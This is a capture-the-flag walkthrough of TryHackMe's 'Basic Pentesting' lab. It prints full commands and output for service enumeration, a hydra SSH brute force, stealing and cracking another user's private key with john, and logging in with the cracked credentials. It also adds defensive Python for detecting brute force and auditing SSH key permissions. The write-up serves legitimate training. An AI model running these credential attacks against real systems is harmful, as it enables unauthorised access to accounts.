
Basic Pentesting

Room information

Type: Challenge
Difficulty: Easy
Tags: Linux
Meta Tags: Walkthrough, Walk-through, Write-up, Writeup
Subscription type: Free
Description: 
This is a machine that allows you to practise web app hacking and privilege escalation

Room link: https://tryhackme.com/r/room/basicpentestingjt

Solution

Check for services with nmap

We start by scanning the machine with nmap

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ nmap -v -sV -sC -p- 10.10.87.99  
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-24 15:15 CEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating Ping Scan at 15:15
Scanning 10.10.87.99 [2 ports]
Completed Ping Scan at 15:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:15
Completed Parallel DNS resolution of 1 host. at 15:15, 0.00s elapsed
Initiating Connect Scan at 15:15
Scanning 10.10.87.99 [65535 ports]
Discovered open port 80/tcp on 10.10.87.99
Discovered open port 445/tcp on 10.10.87.99
Discovered open port 139/tcp on 10.10.87.99
Discovered open port 22/tcp on 10.10.87.99
Discovered open port 8080/tcp on 10.10.87.99
Discovered open port 8009/tcp on 10.10.87.99
Completed Connect Scan at 15:15, 13.63s elapsed (65535 total ports)
Initiating Service scan at 15:15
Scanning 6 services on 10.10.87.99
Completed Service scan at 15:15, 11.15s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.87.99.
Initiating NSE at 15:15
Completed NSE at 15:15, 2.03s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.19s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Nmap scan report for 10.10.87.99
Host is up (0.047s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
|   256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_  256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-06-24T13:15:50
|_  start_date: N/A
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2024-06-24T09:15:51-04:00

NSE: Script Post-scanning.
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Initiating NSE at 15:15
Completed NSE at 15:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.65 seconds

We have six services running:

  • OpenSSH v7.2p2 on port 22
  • Apache httpd v2.4.18 on port 80
  • Samba smbd v3.X - 4.X on port 139
  • Samba smbd v4.3.11 on port 445
  • Apache Jserv (Protocol v1.3) on port 8009
  • Apache Tomcat v 9.0.7 on port 8080

Manually browsing to:

  • Port 80 shows an "Undergoing maintenance" page.
    The HTML page contains this comment: <!-- Check our dev note section if you need to know what to work on. -->
  • Port 8080 shows a default Apache Tomcat/9.0.7 page

Scan for web content with gobuster

Next, let's try to identify common directories with gobuster

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.87.99  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.87.99
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 316] [--> http://10.10.87.99/development/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

The /development directory is likely the dev note section mentioned in the HTML comment.

Browsing to http://10.10.87.99/development/ gives us a directory listing with two files:

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Enumerate Samba/SMB

We continue our enumeration with Samba/SMB using two tools.
First, nmap

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ nmap -v -p 139,445 --script smb-enum* 10.10.87.99                                     
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-24 15:43 CEST
NSE: Loaded 7 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
Initiating Ping Scan at 15:43
Scanning 10.10.87.99 [2 ports]
Completed Ping Scan at 15:43, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 0.00s elapsed
Initiating Connect Scan at 15:43
Scanning 10.10.87.99 [2 ports]
Discovered open port 445/tcp on 10.10.87.99
Discovered open port 139/tcp on 10.10.87.99
Completed Connect Scan at 15:43, 0.04s elapsed (2 total ports)
NSE: Script scanning 10.10.87.99.
Initiating NSE at 15:43
NSE Timing: About 75.00% done; ETC: 15:45 (0:00:30 remaining)
NSE Timing: About 75.00% done; ETC: 15:45 (0:00:40 remaining)
NSE Timing: About 75.00% done; ETC: 15:46 (0:00:54 remaining)
NSE Timing: About 75.00% done; ETC: 15:47 (0:01:10 remaining)
NSE Timing: About 75.00% done; ETC: 15:49 (0:01:26 remaining)
Completed NSE at 15:48, 300.29s elapsed
Nmap scan report for 10.10.87.99
Host is up (0.051s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-sessions: 
|_  <nobody>
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.87.99\Anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.87.99\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
| smb-enum-domains: 
|   BASIC2
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|     Account lockout disabled
|   Builtin
|     Groups: n/a
|     Users: n/a
|     Creation time: unknown
|     Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_    Account lockout disabled

NSE: Script Post-scanning.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 300.72 seconds

Not much useful information there.

Second, enum4linux

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ enum4linux -a 10.10.87.99 | tee enum4linux.txt
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun 24 15:56:23 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.87.99  
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.87.99 )============================


[+] Got domain/workgroup name: WORKGROUP


 ================================( Nbtstat Information for 10.10.87.99 )================================

Looking up status of 10.10.87.99
        BASIC2          <00> -         B <ACTIVE>  Workstation Service
        BASIC2          <03> -         B <ACTIVE>  Messenger Service
        BASIC2          <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================( Session Check on 10.10.87.99 )====================================

<---snip--->

 ===================( Users on 10.10.87.99 via RID cycling (RIDS: 500-550,1000-1050) )===================


[I] Found new SID:                
S-1-22-1

[I] Found new SID:                
S-1-5-32

[I] Found new SID:                
S-1-5-32

[I] Found new SID:                
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                                                                                          

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''                                                         

S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                          

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ================================( Getting printer info for 10.10.87.99 )================================

No printers returned.


enum4linux complete on Mon Jun 24 16:00:07 2024

We have two users identified: kay and jan. The jan user is likely the user with the weak password mentioned before.

Brute-force the password for jan

We can try to brute-force the password for user jan with hydra

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ hydra -P /usr/share/wordlists/rockyou.txt -l jan -s 22 ssh://10.10.87.99  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-24 16:14:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.87.99:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 123.67 tries/min, 371 tries in 00:03h, 14344029 to do in 1933:10h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343634 to do in 2184:38h, 15 active
[22][ssh] host: 10.10.87.99   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-24 16:21:29

Success: the password is armando.
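From the defender's side, a run like the one above leaves a dense trail of sshd "Failed password" lines in the auth log. The following is an added example, not code from the write-up or the room: it parses constructed auth.log lines, keeps a sliding window of failures per (source IP, user), and flags the pair once it crosses a threshold, also reporting a successful login that follows a flagged burst.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches sshd lines such as:
#   Jun 24 16:14:13 basic2 sshd[2041]: Failed password for jan from 10.9.0.5 port 51234 ssh2
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_ts(ts, year=2024):
    # syslog timestamps carry no year; a fixed one is assumed for the sample.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Sliding-window count of failed logins per (source ip, user).

    Returns a dict {(ip, user): peak_failures_in_window} for pairs that reached
    `threshold` failures inside `window_s` seconds, plus a list of
    (ip, user, timestamp) for successful logins that followed a flagged burst,
    which is the event worth paging on."""
    recent = defaultdict(list)
    flagged = {}
    success_after_burst = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        t = parse_ts(m["ts"])
        if m["result"] == "Failed":
            # Keep only failures inside the window ending at this event.
            window = [x for x in recent[key] if (t - x).total_seconds() <= window_s] + [t]
            recent[key] = window
            if len(window) >= threshold:
                flagged[key] = max(flagged.get(key, 0), len(window))
        elif key in flagged:
            success_after_burst.append((m["ip"], m["user"], m["ts"]))
    return flagged, success_after_burst

# Constructed sample, not captured from the room: six rapid failures for jan
# from one source, then a success, then a lone unrelated failure for kay.
SAMPLE_LOG = [
    f"Jun 24 16:14:{13 + i:02d} basic2 sshd[{2041 + i}]: Failed password for jan "
    f"from 10.9.0.5 port {51234 + i} ssh2"
    for i in range(6)
] + [
    "Jun 24 16:14:19 basic2 sshd[2047]: Accepted password for jan from 10.9.0.5 port 51240 ssh2",
    "Jun 24 16:20:02 basic2 sshd[2101]: Failed password for kay from 192.168.56.102 port 40022 ssh2",
]

if __name__ == "__main__":
    hits, logins = detect_bruteforce(SAMPLE_LOG)
    for (ip, user), n in hits.items():
        print(f"possible brute force: {n} failures for {user!r} from {ip}")
    for ip, user, ts in logins:
        print(f"successful login after burst: {user!r} from {ip} at {ts}")
```

Lowering the threshold or widening the window trades false positives for catching slower, throttled attempts such as the ~110 tries/min hydra reported above.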

Login via SSH as jan

Now we can log in via SSH as jan and look for interesting files.

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ ssh jan@10.10.87.99           
The authenticity of host '10.10.87.99 (10.10.87.99)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.99' (ED25519) to the list of known hosts.
jan@10.10.87.99's password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst

No interesting files for this user.

Let's check for other users.

jan@basic2:~$ cd ..
jan@basic2:/home$ ls -la
total 16
drwxr-xr-x  4 root root 4096 Apr 19  2018 .
drwxr-xr-x 24 root root 4096 Apr 23  2018 ..
drwxr-xr-x  2 root root 4096 Apr 23  2018 jan
drwxr-xr-x  5 kay  kay  4096 Apr 23  2018 kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$ 

We have a world-readable private key (id_rsa, mode -rw-r--r--), so jan can read kay's key.
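The check a defender would schedule to catch this class of finding, written here as an added example and not taken from the room or the write-up: it audits each user's ~/.ssh for private keys with any group/other access bits and for a writable authorized_keys, using a constructed temporary home tree that mirrors the 0644 id_rsa and 0664 authorized_keys above (no real key material).

```python
import stat
import tempfile
from pathlib import Path

# Any group/other access bit on a private key is a finding (the id_rsa above is 0644).
GROUP_OTHER = stat.S_IRWXG | stat.S_IRWXO
GROUP_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH
PRIVATE_KEY_NAMES = ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")

def audit_ssh_dir(ssh_dir):
    """Return (path, problem) findings for one ~/.ssh directory."""
    findings = []
    ssh_dir = Path(ssh_dir)
    if not ssh_dir.is_dir():
        return findings
    dmode = ssh_dir.stat().st_mode
    if dmode & GROUP_OTHER_WRITE:
        findings.append((str(ssh_dir), f"directory writable by group/other ({stat.filemode(dmode)})"))
    for entry in sorted(ssh_dir.iterdir()):
        if not entry.is_file():
            continue
        mode = entry.stat().st_mode
        if entry.name in PRIVATE_KEY_NAMES and mode & GROUP_OTHER:
            findings.append((str(entry), f"private key readable by group/other ({stat.filemode(mode)})"))
        elif entry.name == "authorized_keys" and mode & GROUP_OTHER_WRITE:
            findings.append((str(entry), f"authorized_keys writable by group/other ({stat.filemode(mode)})"))
    return findings

def audit_home(home_root):
    """Audit <home_root>/<user>/.ssh for every user; returns {user: findings}."""
    results = {}
    for user_dir in sorted(Path(home_root).iterdir()):
        findings = audit_ssh_dir(user_dir / ".ssh")
        if findings:
            results[user_dir.name] = findings
    return results

def build_sample_home():
    """Constructed fixture mirroring the listing above: kay's id_rsa is 0644,
    authorized_keys is 0664, and jan has no .ssh directory. Placeholder content only."""
    root = Path(tempfile.mkdtemp(prefix="home_"))
    (root / "jan").mkdir()
    kay_ssh = root / "kay" / ".ssh"
    kay_ssh.mkdir(parents=True)
    for name, mode in (("id_rsa", 0o644), ("id_rsa.pub", 0o644), ("authorized_keys", 0o664)):
        path = kay_ssh / name
        path.write_text("constructed placeholder, not a real key\n")
        path.chmod(mode)
    kay_ssh.chmod(0o755)
    return root

if __name__ == "__main__":
    for user, findings in audit_home(build_sample_home()).items():
        for path, problem in findings:
            print(f"{user}: {problem}: {path}")
```

Point audit_home at /home on a real host to run the same check; the public key id_rsa.pub is deliberately not flagged, since 0644 is its normal mode.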

Crack the SSH private key

We copy the file to our local machine, extract the hash with ssh2john, and try to crack it with john.

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ scp jan@10.10.87.99:/home/kay/.ssh/id_rsa id_rsa_kay
jan@10.10.87.99's password: 
id_rsa                                                                                                                             100% 3326    35.7KB/s   00:00  

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ ssh2john id_rsa_kay > kay_hash.txt
           
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kay_hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (id_rsa_kay)     
1g 0:00:00:00 DONE (2024-06-24 16:33) 4.347g/s 359791p/s 359791c/s 359791C/s bird..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The password is beeswax.

Login via SSH as kay

Next, we log in via SSH as kay with the private key and the cracked passphrase.

┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/Basic_Pentesting]
└─$ ssh -i id_rsa_kay kay@10.10.87.99 
Enter passphrase for key 'id_rsa_kay': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ 

Get the final password

Finally, we search for the final password.

kay@basic2:~$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
kay@basic2:~$ cat pass.bak 
h<REDACTED>$
kay@basic2:~$ 

For additional information, please see the references below.

References